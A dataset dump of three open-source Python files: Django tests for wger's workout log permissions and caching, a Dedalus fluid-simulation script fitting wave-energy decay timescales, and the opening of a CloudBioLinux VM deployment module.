text stringlengths 12 1.05M | repo_name stringlengths 5 86 | path stringlengths 4 191 | language stringclasses 1 value | license stringclasses 15 values | size int32 12 1.05M | keyword listlengths 1 23 | text_hash stringlengths 64 64 |
|---|---|---|---|---|---|---|---|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
import datetime
import logging
from django.contrib.auth.models import User
from django.core.cache import cache
from django.core.urlresolvers import reverse, reverse_lazy
from wger.core.tests import api_base_test
from wger.core.tests.base_testcase import WorkoutManagerDeleteTestCase
from wger.core.tests.base_testcase import WorkoutManagerTestCase
from wger.exercises.models import Exercise
from wger.manager.models import Workout
from wger.manager.models import WorkoutLog
from wger.manager.models import WorkoutSession
from wger.utils.cache import cache_mapper
logger = logging.getLogger(__name__)
class WorkoutLogShareButtonTestCase(WorkoutManagerTestCase):
    '''
    Test that the share button is correctly displayed and hidden
    '''

    def test_share_button(self):
        '''
        The share button is visible only to the owner of log pk 1 (admin)
        '''
        url = reverse('manager:log:log', kwargs={'pk': 1})

        # (user to log in as, whether the button is expected to show)
        scenarios = ((None, False), ('admin', True), ('test', False))
        for username, expect_button in scenarios:
            if username is not None:
                self.user_login(username)
            response = self.client.get(url)
            if expect_button:
                self.assertTrue(response.context['show_shariff'])
            else:
                self.assertFalse(response.context['show_shariff'])
class WeightLogAccessTestCase(WorkoutManagerTestCase):
    '''
    Test accessing the weight log page
    '''

    def test_access_shared(self):
        '''
        Test accessing the URL of a shared weight log

        Log pk 1 is shared, so every visitor gets a 200.
        '''
        url = reverse('manager:log:log', kwargs={'pk': 1})

        self.user_login('admin')
        self.assertEqual(self.client.get(url).status_code, 200)

        self.user_login('test')
        self.assertEqual(self.client.get(url).status_code, 200)

        self.user_logout()
        self.assertEqual(self.client.get(url).status_code, 200)

    def test_access_not_shared(self):
        '''
        Test accessing the URL of a private weight log

        Log pk 3 belongs to 'test'; everybody else gets a 403.
        '''
        url = reverse('manager:log:log', kwargs={'pk': 3})

        self.user_login('admin')
        self.assertEqual(self.client.get(url).status_code, 403)

        self.user_login('test')
        self.assertEqual(self.client.get(url).status_code, 200)

        self.user_logout()
        self.assertEqual(self.client.get(url).status_code, 403)
class CalendarShareButtonTestCase(WorkoutManagerTestCase):
    '''
    Test that the share button is correctly displayed and hidden
    '''

    def test_share_button(self):
        '''
        Only the calendar's owner (admin) sees the share button
        '''
        url = reverse('manager:workout:calendar', kwargs={'username': 'admin'})

        scenarios = ((None, False), ('admin', True), ('test', False))
        for username, expect_button in scenarios:
            if username is not None:
                self.user_login(username)
            response = self.client.get(url)
            if expect_button:
                self.assertTrue(response.context['show_shariff'])
            else:
                self.assertFalse(response.context['show_shariff'])
class CalendarAccessTestCase(WorkoutManagerTestCase):
    '''
    Test accessing the calendar page
    '''

    def test_access_shared(self):
        '''
        Test accessing the URL of a shared calendar page
        '''
        # Admin's calendar is shared, so the owner, another user and an
        # anonymous visitor all get a 200
        url = reverse('manager:workout:calendar', kwargs={'username': 'admin'})
        self.user_login('admin')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.user_login('test')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.user_logout()
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)

    def test_access_not_shared(self):
        '''
        Test accessing the URL of an unshared calendar page
        '''
        # Only the owner ('test') may see the page; everybody else gets a 404
        url = reverse('manager:workout:calendar', kwargs={'username': 'test'})
        self.user_login('admin')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
        self.user_login('test')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.user_logout()
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
class WeightLogOverviewAddTestCase(WorkoutManagerTestCase):
    '''
    Tests the weight log functionality
    '''

    def add_weight_log(self, fail=True):
        '''
        Helper function to test adding weight log entries

        :param fail: whether the currently logged-in user is expected to
                     be rejected when posting new entries
        '''
        # Fetch the overview page
        response = self.client.get(reverse('manager:log:log', kwargs={'pk': 1}))
        # All access OK, since user 1 has ro_access = True
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.context['active_tab'], 'workout')
        self.assertEqual(response.context['workout'].id, 1)
        # Open the log entry page
        response = self.client.get(reverse('manager:day:log', kwargs={'pk': 1}))
        if fail:
            self.assertIn(response.status_code, (302, 403))
        else:
            self.assertEqual(response.status_code, 200)
        # Add new log entries via the formset (two filled forms out of three)
        count_before = WorkoutLog.objects.count()
        response = self.client.post(reverse('manager:day:log', kwargs={'pk': 1}),
                                    {'date': '2012-01-01',
                                     'notes': 'My cool impression',
                                     'impression': '3',
                                     'time_start': datetime.time(10, 0),
                                     'time_end': datetime.time(12, 0),
                                     'form-0-reps': 10,
                                     'form-0-repetition_unit': 1,
                                     'form-0-weight': 10,
                                     'form-0-weight_unit': 1,
                                     'form-1-reps': 10,
                                     'form-1-repetition_unit': 1,
                                     'form-1-weight': 10,
                                     'form-1-weight_unit': 1,
                                     'form-TOTAL_FORMS': 3,
                                     'form-INITIAL_FORMS': 0,
                                     'form-MAX-NUM_FORMS': 3
                                     })
        count_after = WorkoutLog.objects.count()
        # Logged out users get a 302 redirect to login page
        # Users not owning the workout, a 403, forbidden
        if fail:
            self.assertIn(response.status_code, (302, 403))
            self.assertEqual(count_before, count_after)
        else:
            self.assertEqual(response.status_code, 302)
            self.assertGreater(count_after, count_before)

    def test_add_weight_log_anonymous(self):
        '''
        Tests adding weight log entries as an anonymous user
        '''
        self.add_weight_log(fail=True)

    def test_add_weight_log_owner(self):
        '''
        Tests adding weight log entries as the owner user
        '''
        self.user_login('admin')
        self.add_weight_log(fail=False)

    def test_add_weight_log_other(self):
        '''
        Tests adding weight log entries as a logged user not owning the data
        '''
        self.user_login('test')
        self.add_weight_log(fail=True)
class WeightlogTestCase(WorkoutManagerTestCase):
    '''
    Tests other model methods
    '''

    def test_get_workout_session(self):
        '''
        Test the get_workout_session method of WorkoutLog

        A log entry must resolve to the session of the same user on the
        same date, ignoring sessions of other users or other dates.
        '''
        user1 = User.objects.get(pk=1)
        user2 = User.objects.get(pk=2)
        workout1 = Workout.objects.get(pk=2)
        # NOTE(review): both variables load workout pk=2 -- workout2 was
        # probably meant to be a different workout for user2; confirm
        # against the fixtures.
        workout2 = Workout.objects.get(pk=2)
        WorkoutLog.objects.all().delete()

        # Renamed from 'l' (ambiguous single-character name, PEP 8 / E741)
        log = WorkoutLog()
        log.user = user1
        log.date = datetime.date(2014, 1, 5)
        log.exercise = Exercise.objects.get(pk=1)
        log.workout = workout1
        log.weight = 10
        log.reps = 10
        log.save()

        # Session matching the log's user and date -- the expected result
        session1 = WorkoutSession()
        session1.user = user1
        session1.workout = workout1
        session1.notes = 'Something here'
        session1.impression = '3'
        session1.date = datetime.date(2014, 1, 5)
        session1.save()

        # Same user, different date -- must not match
        session2 = WorkoutSession()
        session2.user = user1
        session2.workout = workout1
        session2.notes = 'Something else here'
        session2.impression = '1'
        session2.date = datetime.date(2014, 1, 1)
        session2.save()

        # Same date, different user -- must not match
        session3 = WorkoutSession()
        session3.user = user2
        session3.workout = workout2
        session3.notes = 'The notes here'
        session3.impression = '2'
        session3.date = datetime.date(2014, 1, 5)
        session3.save()

        self.assertEqual(log.get_workout_session(), session1)
class WeightLogDeleteTestCase(WorkoutManagerDeleteTestCase):
    '''
    Tests deleting a WorkoutLog
    '''
    # Model class the generic delete test case operates on
    object_class = WorkoutLog
    # Delete view for the fixture entry
    url = reverse_lazy('manager:log:delete', kwargs={'pk': 1})
    # Primary key of the fixture entry to delete
    pk = 1
class WeightLogEntryEditTestCase(WorkoutManagerTestCase):
    '''
    Tests editing individual weight log entries
    '''

    def edit_log_entry(self, fail=True):
        '''
        Helper function to test editing log entries

        :param fail: whether the currently logged-in user is expected to
                     be rejected when editing the entry
        '''
        response = self.client.get(reverse('manager:log:edit', kwargs={'pk': 1}))
        if fail:
            # assertIn gives a clearer failure message than
            # assertTrue(x in ...)
            self.assertIn(response.status_code, (302, 403))
        else:
            self.assertEqual(response.status_code, 200)

        date_before = WorkoutLog.objects.get(pk=1).date
        response = self.client.post(reverse('manager:log:edit', kwargs={'pk': 1}),
                                    {'date': '2012-01-01',
                                     'reps': 10,
                                     'repetition_unit': 2,
                                     'weight_unit': 3,
                                     'weight': 10,
                                     'exercise': 1
                                     })
        date_after = WorkoutLog.objects.get(pk=1).date

        if fail:
            # Logged out users get a 302 redirect to login page
            # Users not owning the workout, a 403, forbidden
            self.assertIn(response.status_code, (302, 403))
            self.assertEqual(date_before, date_after)
        else:
            self.assertEqual(response.status_code, 302)
            self.assertEqual(date_after, datetime.date(2012, 1, 1))

    def test_edit_log_entry_anonymous(self):
        '''
        Tests editing a weight log entries as an anonymous user
        '''
        self.edit_log_entry(fail=True)

    def test_edit_log_entry_owner(self):
        '''
        Tests editing a weight log entries as the owner user
        '''
        self.user_login('admin')
        self.edit_log_entry(fail=False)

    def test_edit_log_entry_other(self):
        '''
        Tests editing a weight log entries as a logged user not owning the data
        '''
        self.user_login('test')
        self.edit_log_entry(fail=True)
class WorkoutLogCacheTestCase(WorkoutManagerTestCase):
    '''
    Workout log cache test case
    '''

    def test_calendar(self):
        '''
        Test the log cache is correctly generated on visit
        '''
        # Month cache key is hash((user pk, year, month))
        log_hash = hash((1, 2012, 10))
        self.user_login('admin')
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))

    def test_calendar_day(self):
        '''
        Test the log cache on the calendar day view is correctly generated on visit
        '''
        # Day views append the day to the cache key
        log_hash = hash((1, 2012, 10, 1))
        self.user_login('admin')
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
                                                                        'year': 2012,
                                                                        'month': 10,
                                                                        'day': 1}))
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))

    def test_calendar_anonymous(self):
        '''
        Test the log cache is correctly generated on visit by anonymous users
        '''
        log_hash = hash((1, 2012, 10))
        self.user_logout()
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.client.get(reverse('manager:workout:calendar', kwargs={'username': 'admin',
                                                                    'year': 2012,
                                                                    'month': 10}))
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))

    def test_calendar_day_anonymous(self):
        '''
        Test the log cache is correctly generated on visit by anonymous users
        '''
        log_hash = hash((1, 2012, 10, 1))
        self.user_logout()
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
                                                                        'year': 2012,
                                                                        'month': 10,
                                                                        'day': 1}))
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))

    def test_cache_update_log(self):
        '''
        Test that the caches are cleared when saving a log
        '''
        log_hash = hash((1, 2012, 10))
        log_hash_day = hash((1, 2012, 10, 1))
        self.user_login('admin')
        # Populate both caches first by visiting the views
        self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
        self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
                                                                        'year': 2012,
                                                                        'month': 10,
                                                                        'day': 1}))
        log = WorkoutLog.objects.get(pk=1)
        log.weight = 35
        log.save()
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))

    def test_cache_update_log_2(self):
        '''
        Test that the caches are only cleared for the log's month
        '''
        log_hash = hash((1, 2012, 10))
        log_hash_day = hash((1, 2012, 10, 1))
        self.user_login('admin')
        self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
        self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
                                                                        'year': 2012,
                                                                        'month': 10,
                                                                        'day': 1}))
        # Log pk 3 belongs to a different month, so the October caches survive
        log = WorkoutLog.objects.get(pk=3)
        log.weight = 35
        log.save()
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))

    def test_cache_delete_log(self):
        '''
        Test that the caches are cleared when deleting a log
        '''
        log_hash = hash((1, 2012, 10))
        log_hash_day = hash((1, 2012, 10, 1))
        self.user_login('admin')
        self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
        self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
                                                                        'year': 2012,
                                                                        'month': 10,
                                                                        'day': 1}))
        log = WorkoutLog.objects.get(pk=1)
        log.delete()
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.assertFalse(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))

    def test_cache_delete_log_2(self):
        '''
        Test that the caches are only cleared for the log's month
        '''
        log_hash = hash((1, 2012, 10))
        log_hash_day = hash((1, 2012, 10, 1))
        self.user_login('admin')
        self.client.get(reverse('manager:workout:calendar', kwargs={'year': 2012, 'month': 10}))
        self.client.get(reverse('manager:workout:calendar-day', kwargs={'username': 'admin',
                                                                        'year': 2012,
                                                                        'month': 10,
                                                                        'day': 1}))
        # Deleting a log of another month must not touch the October caches
        log = WorkoutLog.objects.get(pk=3)
        log.delete()
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash)))
        self.assertTrue(cache.get(cache_mapper.get_workout_log_list(log_hash_day)))
class WorkoutLogApiTestCase(api_base_test.ApiBaseResourceTestCase):
    '''
    Tests the workout log overview resource
    '''
    # Primary key of the fixture entry used for detail-view tests
    pk = 5
    # Model exposed by the API resource under test
    resource = WorkoutLog
    # The resource requires authentication
    private_resource = True
    # Payload used by the base class for create/update tests
    data = {"exercise": 1,
            "workout": 3,
            "reps": 3,
            "repetition_unit": 1,
            "weight_unit": 2,
            "weight": 2,
            "date": datetime.date.today()}
| kjagoo/wger_stark | wger/manager/tests/test_weight_log.py | Python | agpl-3.0 | 18,455 | [
"VisIt"
] | dafd152e641c6157bed029c6cec171037212975c692a2b1d1f7c394b996d36f5 |
import numpy as np
import h5py
from dedalus import public as de
from dedalus.extras import flow_tools
import time
import argparse
import dedalus_plots as dp
import taufit
import matplotlib.pyplot as plt
def forcing(solver):
    '''
    Buoyancy forcing term evaluated on the dealiased grid (xd, zd).

    Active only while solver.sim_time < pulse_len; zeroed above the
    tropopause (zd > Lz). Relies on module-level globals: pulse_len,
    m, k, Lx, Lz, xd, zd.
    '''
    # if using dealiasing, it's important to apply the forcing on the dealiased doman (xd,zd)
    if solver.sim_time < pulse_len:
        #f = 0.001*np.sin(np.pi*zd/Lz)*np.exp(-16.*(xd*xd)/((lambda_x)**2)) #pulse with "effective wavelength" lambda_x
        f = 0.001*np.sin(m * np.pi*zd/Lz)*np.cos(2. * k* np.pi* xd /Lx) # cosine wave
        strat = np.where(zd>Lz)
        f[:,strat] = 0.
        # NOTE(review): this unconditional overwrite makes the cosine forcing
        # above dead code -- the function always returns 0. Looks like a
        # leftover debug/disable line; confirm whether forcing is meant to
        # be off (the runs below initialize B directly instead).
        f = 0.
    else:
        f = 0.
    return f
# ---- command-line interface ----
parser = argparse.ArgumentParser(description='simulate a Boussinesq pulse')
parser.add_argument('k', metavar = 'k', type = int, help='forcing wavenumber in the horizontal')
parser.add_argument('m', metavar = 'm', type = int, help='forcing wavenumber in the vertical')
parser.add_argument('eps', metavar = 'eps', type = float, help='epsilon, the ratio of buoyancy frequency in troposphere and stratosphere')
parser.add_argument('-nh','--non-hstat', dest='hstat', action='store_false')
parser.add_argument('-p','--pulse', dest='pulse', action='store_true')
parser.add_argument('-pl', '--pulse-len', dest = 'pulse_len' , type = float)
parser.set_defaults(pulse_len=100)
parser.set_defaults(hstat=True)
parser.set_defaults(pulse=False)
args = parser.parse_args()
PULSE = args.pulse
HYDROSTATIC = args.hstat
#print('pulse_len is ', args.pulse_len)
if HYDROSTATIC == True:
    print('using hydrostatic boussinesq solver')
else:
    print('using non-hydrostatic boussinesq solver')
if PULSE == True:
    print('solving for gaussian forcing')
else:
    print('solving for cosine forcing (single k)')
# Raise dedalus' pre-installed root handlers to INFO to cut log noise
import logging
root = logging.root
for h in root.handlers:
    h.setLevel("INFO")
logger = logging.getLogger(__name__)
# ---- grid, domain and problem definition ----
Lx, Lz = (3000000, 10000) # domain size in meters
nx, nz = (144, 300) # number of points in each direction
#Lx, Lz = (4000000, 10000) # domain size in meters
#nx, nz = (4*64, 144) # number of points in each direction
# parameters (some of these should be set via command line args)
stop_time = 20000. # simulation stop time (seconds)
pulse_len = args.pulse_len # seconds of forcing
N1 = 0.01 # buoyancy frequency in the troposphere (1/s)
# Create bases and domain
x_basis = de.Fourier('x', nx, interval=(-Lx/2., Lx/2.))
# compound z basis -- better to resolve jump condition?
#zb1 = de.Chebyshev('z1',int(nz/4), interval=(0, Lz+1000), dealias=3/2)
#zb2 = de.Chebyshev('z2', nz, interval=(Lz+1000,model_top), dealias = 3/2)
#z_basis = de.Compound('z',(zb1,zb2), dealias = 3/2)
#
eps = args.eps # ratio of N1/N2
N2 = N1/eps # buoyancy frequency in the stratosphere
model_top = 16. * Lz # lid height
if eps < 0.41:
    model_top = 6. * Lz # increases resolution near the jump
z_basis = de.Chebyshev('z', nz, interval= (0, model_top))
domain = de.Domain([x_basis, z_basis], grid_dtype=np.float64)
x, z = domain.grids(scales=1)
# dealiased grids, used by the forcing function
xd, zd = domain.grids(scales=domain.dealias)
# set up problem
problem = de.IVP(domain, variables=['p','u','B','w'])
problem.parameters['rho'] = 1. #kg/m^3
#problem.parameters['Nsq'] = 0.0001 #1/s; constant Nsq
# non-constant coefficient N^2: N1 below the tropopause, N2 above
ncc = domain.new_field(name='Nsq')
ncc['g'] = N1**2
strat = np.where( z > Lz)
ncc['g'][:,strat] = N2**2
ncc.meta['x']['constant'] = True
problem.parameters['Nsq'] = ncc
# mask (for analysis): 1 in the troposphere, 0 in the stratosphere
mask = domain.new_field(name = 'mask')
mask['g'] = 1
mask['g'][:,strat] = 0
mask.meta['x']['constant'] = True
problem.parameters['mask'] = mask
#define general forcing function
forcing_func = de.operators.GeneralFunction(domain,'g',forcing, args=[])
forcing_func.build_metadata()
#forcing_func.meta = ncc.meta # just tricking it for now, this metadata is wrong
# let's make a general parameter and use that metadata instead
dummy = domain.new_field(name='dum')
dummy['g'] = 1.
forcing_func.meta = dummy.meta
problem.parameters['forcing_func'] = forcing_func
# need to add 'meta' attribute for General Function class
# otherwise system fails consistency check
# system to solve (2D, linearized, hydrostatic boussinesq)
problem.add_equation("dt(u) + 1/rho*dx(p) = 0")
problem.add_equation("dt(B) + Nsq*w = forcing_func")
#problem.add_equation("dt(B) + Nsq*w = 0")
problem.add_equation("dx(u) + dz(w) = 0")
if HYDROSTATIC == True:
    problem.add_equation("B - 1/rho*dz(p) = 0")
else:
    problem.add_equation("B - 1/rho*dz(p) - dt(w) = 0")
# fourier direction has periodic bc, chebyshev has a lid
problem.add_bc("left(w) = 0") # refers to the first end point in chebyshev direction
problem.add_bc("right(w) = 0", condition="(nx != 0)") # rigid lid, condition note for k = 0 mode
problem.add_bc("integ(p,'z') = 0", condition="(nx == 0)") # pressure gauge condition for k = 0
# build solver
ts = de.timesteppers.RK443 # arbitrary choice of time stepper
#solver = problem.build_solver(ts)
# initial conditions
#x, z = domain.grids(scales=1)
#u = solver.state['u']
#w = solver.state['w']
#p = solver.state['p']
#B = solver.state['B'] # zero for everything
#solver.stop_sim_time = stop_time
#solver.stop_wall_time = np.inf
#solver.stop_iteration = np.inf
# CFL conditions
#initial_dt = 0.8*Lz/nz
#cfl = flow_tools.CFL(solver,initial_dt,safety=0.8, max_change=1.5, min_change=0.5, max_dt=400)
# too large of a timestep makes things rather diffusive
#cfl.add_velocities(('u','w'))
# ---- parameter sweep: run one simulation per horizontal wavenumber k ----
archive_list = []
for k in range(3,10):
    m = args.m # vertical mode number
    #k = args.k # horizontal mode number
    sim_name = 'k'+ str(k) +'m' + str(m)
    print('simulation name is', sim_name)
    print('effective forcing horizontal wavelength is' , Lx/k/1000., 'kilometers')
    print('effective forcing vertical wavelength is' , 2.*Lz/m/1000., 'kilometers')
    print('stratification ratio N1/N2 is' , N1/N2 )
    # initial conditions -- a fresh solver per k
    solver = problem.build_solver(ts)
    # tell the forcing function what its arg is (clunky)
    forcing_func.args = [solver]
    forcing_func.original_args = [solver]
    x, z = domain.grids(scales=1)
    u = solver.state['u']
    w = solver.state['w']
    p = solver.state['p']
    B = solver.state['B'] # zero for everything
    u['g'] = 0.
    w['g'] = 0.
    p['g'] = 0.
    B['g'] = 0.
    # predicted decay timescales: leading-order and corrected estimates
    tau_approx = Lx*np.pi*m**2/(2.*Lz*eps*N1*k*2.)
    tau_exact = tau_approx + eps * (Lx/Lz) * (2. * (m*np.pi)**2 - 3.)/(12. * N1 * k * np.pi * 2.)
    solver.stop_sim_time =0.5*tau_exact
    solver.stop_wall_time = np.inf
    solver.stop_iteration = np.inf
    # start from a single-mode buoyancy anomaly confined to the troposphere
    B['g'] = 0.01*np.sin(m * np.pi*z/Lz)*np.cos(k* 2* np.pi* x /Lx)
    B['g'][:,strat] = 0.
    # CFL conditions
    initial_dt = 0.8*Lz/nz
    cfl = flow_tools.CFL(solver,initial_dt,safety=0.8, max_change=5., min_change=0.5, max_dt=300)
    # too large of a timestep makes things rather diffusive
    cfl.add_velocities(('u','w'))
    # fields to record
    analysis = solver.evaluator.add_file_handler(sim_name, sim_dt=10, max_writes=2000)
    analysis.add_task('B', name = 'buoyancy' )
    # 1d fields
    analysis.add_task('mask')
    ##analysis.add_task("integ(B * mask)", name = 'tropo b')
    analysis.add_task("integ(0.5 * mask *(u*u + w*w + B*B/Nsq ))", name = 'tropo energy') # use mask to integrate over troposphere only
    #analysis.add_task("integ(0.5 * (u*u + w*w + B*B/Nsq ))", name='total e')
    try:
        logger.info('Starting loop')
        start_time = time.time()
        while solver.ok:
            dt = cfl.compute_dt()
            solver.step(dt)
            if solver.iteration % 20 == 0:
                print('Completed iteration {}'.format(solver.iteration))
                print('simulation time {}'.format(solver.sim_time))
    except:
        # NOTE(review): bare except also catches KeyboardInterrupt, but it
        # re-raises, so nothing is swallowed.
        logger.error('Exception raised, triggering end of main loop.')
        raise
    finally:
        end_time = time.time()
        # Print statistics
        logger.info('Run time: %f' %(end_time-start_time))
        logger.info('Iterations: %i' %solver.iteration)
    # archive decay timescales
    filepath = sim_name + "/" + sim_name + "_s1/" + sim_name + "_s1_p0.h5"
    print(filepath)
    # open data file
    data = h5py.File(filepath, "r")
    # read in variables and dimensions
    dict_vars = {'tropenergy':'tropo energy', 'b3d':'buoyancy'}
    vars = dp.read_vars(data, dict_vars)
    dims = dp.read_dims(data)
    data.close()
    energ_normed = vars['tropenergy'][:,0,0]/np.max(vars['tropenergy'][:,0,0])
    # fit the simulated decay rate and append the result to archive_list
    taufit.taufit(energ_normed,dims, m, k, eps, Lx, Lz, archive_list)
    #tau_approx = Lx*np.pi*m**2/(2.*Lz*eps*N1*k*2.)
    #tau_exact = tau_approx + eps * (Lx/Lz) * (2. * (m*np.pi)**2 - 3.)/(12. * N1 * k * np.pi * 2.)
    #tau_off = Lx*(6 + np.pi**2*m**2*(1.+3.*eps**2))/(6.*eps*N1*k*np.p
    energ_normed = vars['tropenergy'][:,0,0]/np.max(vars['tropenergy'][:,0,0])
    energ_theory = np.exp(-(dims['t'] - pulse_len )/tau_exact)
    energ_approx = np.exp(-(dims['t'] - pulse_len )/tau_approx)
    #energ_off = np.exp(-(dims['t'] - pulse_len)/tau_off)
    dp.make_1D_plot(sim_name+'/energytest.pdf', dims['t'], simulation = energ_normed,
                    theory = energ_theory, approx = energ_approx)
    dp.make_2D_plot(sim_name+'/binit.pdf', (dims['x']/1000., dims['z']/1000.),vars['b3d'][1,:,:].T , title='b initial', xlabel = 'x (km)', ylabel = 'z (km)')
    plt.clf()
    plt.plot(dims['t'], np.log(energ_normed))
    plt.plot(dims['t'], -1./tau_exact*dims['t'], label = 'theory')
    plt.legend()
    plt.savefig(sim_name + '/regresstest.pdf')
    plt.clf()
# summary plot and pickle of the fitted timescales across all k
taufit.plot_taus(archive_list)
import pickle
outfile = open( "eps02_m2.p", "wb" )
pickle.dump(archive_list, outfile)
#dp.make_1D_plot(sim_name+'/energytest.pdf', dims['t'], simulation = energ_normed,
#                theory = energ_theory, offmode = energ_off)
#dp.make_2D_plot(sim_name+'/bend.pdf', (dims['x']/1000., dims['z']/1000.),vars['b3d'][-1,:,:].T , title='b final', xlabel = 'x (km)', ylabel = 'z (km)')i
| jedman/dedalus-leakylid | dedalus_tausim.py | Python | gpl-2.0 | 10,007 | [
"Gaussian"
] | c34b605d0b436b207c37e6d04c071762b876cb2b26989436345383222d7e7b10 |
#!/usr/bin/env python
import os
from tempfile import tempdir
from subprocess import call
from inspect import getargspec
from cloudbio.utils import _setup_logging, _configure_fabric_environment, _parse_fabricrc
from cloudbio.biodata.genomes import install_data, install_data_s3, install_data_rsync
from cloudbio.galaxy import _setup_galaxy_env_defaults
from cloudbio.galaxy.utils import _chown_galaxy
from cloudbio.galaxy.tools import _install_tools
from fabfile import _perform_install, _install_custom
from .util import eval_template
from .volume import attach_volumes, make_snapshots, detach_volumes
import cloudbio.deploy.plugins
from fabric.main import load_settings
from fabric.api import put, run, env, settings, sudo
try:
from .vmlauncher.transfer import FileTransferManager
from .vmlauncher import build_vm_launcher
except ImportError:
build_vm_launcher = None
FileTransferManager = None
DEFAULT_CLOUDBIOLINUX_TARGET = None
DEFAULT_CLOUDBIOLINUX_FLAVOR = None
def deploy(options):
    '''
    Top-level entry point: expand the requested ``actions`` and drive a
    (possibly virtual) machine through them.
    '''
    _setup_logging(env)
    actions = _expand_actions(options.get("actions"))
    # "novm" targets a real/preexisting host instead of launching a cloud VM
    if options["vm_provider"] == "novm":
        vm_launcher = LocalVmLauncher(options)
    else:
        if not build_vm_launcher:
            raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
        vm_launcher = build_vm_launcher(options)
    if _do_perform_action("list", actions):
        for node in vm_launcher.list():
            print "Active node with uuid %s <%s>" % (node.uuid, node)
    if _do_perform_action("destroy", actions):
        # Destroy only nodes whose name matches the configured hostname
        target_name = options["hostname"]
        for node in vm_launcher.list():
            node_name = node.name
            if node_name == target_name:
                vm_launcher.destroy(node)
    __invoke_plugin_actions(env, actions, "local_actions", [vm_launcher, options])
    # Do we have remaining actions requiring an vm?
    if len(actions) > 0:
        print 'Setting up virtual machine'
        vm_launcher.boot_and_connect()
        _setup_vm(options, vm_launcher, actions)
class LocalVmLauncher:
    """Provide a lightweight real machine, non-vm class for launching.
    """

    def __init__(self, options):
        self.options = options

    def get_ip(self):
        # Fall back to localhost when no hostname was configured
        return self.options.get("hostname", None) or "localhost"

    def get_key_file(self):
        # No SSH key needed for a local machine
        return None

    def boot_and_connect(self):
        # Nothing to boot -- the machine already exists
        pass

    def destroy(self):
        # Real machines are never destroyed
        pass

    def get_user(self):
        return env.user

    def list(self):
        # A local machine has no managed nodes
        return []
def _setup_vm(options, vm_launcher, actions):
    '''
    Run the remaining (remote) actions against the booted machine, then
    optionally destroy it.
    '''
    destroy_on_complete = get_boolean_option(options, 'destroy_on_complete', False)
    try:
        ip = vm_launcher.get_ip()
        _setup_fabric(vm_launcher, ip, options)
        with settings(host_string=ip):
            _setup_cloudbiolinux(options)
            if 'attach_volumes' in actions:
                attach_volumes(vm_launcher, options)
            if 'max_lifetime' in options:
                # Schedule an automatic shutdown as a safety net
                seconds = options['max_lifetime']
                # Unclear why the sleep is needed, but seems to be otherwise
                # this doesn't work.
                run("bash -c 'nohup sudo shutdown -h %d &'; sleep 2" % seconds)
            configure_instance(options, actions)
            if 'transfer' in actions:
                transfer_files(options)
            __invoke_plugin_actions(env, actions, "ready_actions", [vm_launcher, options])
            if 'ssh' in actions:
                _interactive_ssh(vm_launcher)
            if 'attach_ip' in actions:
                vm_launcher.attach_public_ip()
            if 'snapshot_volumes' in actions:
                make_snapshots(vm_launcher, options)
            if 'detach_volumes' in actions:
                detach_volumes(vm_launcher, options)
            if 'package' in actions:
                # Image name template may interpolate fabric env values
                name_template = vm_launcher.package_image_name()
                name = eval_template(env, name_template)
                vm_launcher.package(name=name)
            if not destroy_on_complete and hasattr(vm_launcher, "uuid"):
                print 'Your instance (%s) is waiting at http://%s' % (vm_launcher.uuid, ip)
    finally:
        # Tear the machine down even if an action above failed
        if destroy_on_complete:
            vm_launcher.destroy()
def _expand_actions(actions):
    '''
    Normalize the requested action names: keep known simple actions and
    expand plugin-defined compound actions into their component parts.
    '''
    unique_actions = set()
    for simple_action in _possible_actions():
        if simple_action in actions:
            unique_actions.add(simple_action)
    compound_actions = __get_plugin_actions(env, "compound_actions")
    for compound_action in compound_actions.keys():
        if compound_action in actions:
            for compound_action_part in compound_actions[compound_action]:
                unique_actions.add(compound_action_part)
    return unique_actions
def _possible_actions():
    '''
    Return the list of recognized simple action names: the built-ins below
    plus every action registered by plugins.
    '''
    possible_actions = [ "list",
                         "destroy",
                         "transfer",
                         "purge_tools",
                         "setup_tools",
                         "setup_biodata",
                         "setup_ssh_key",
                         "package",
                         "setup_image",
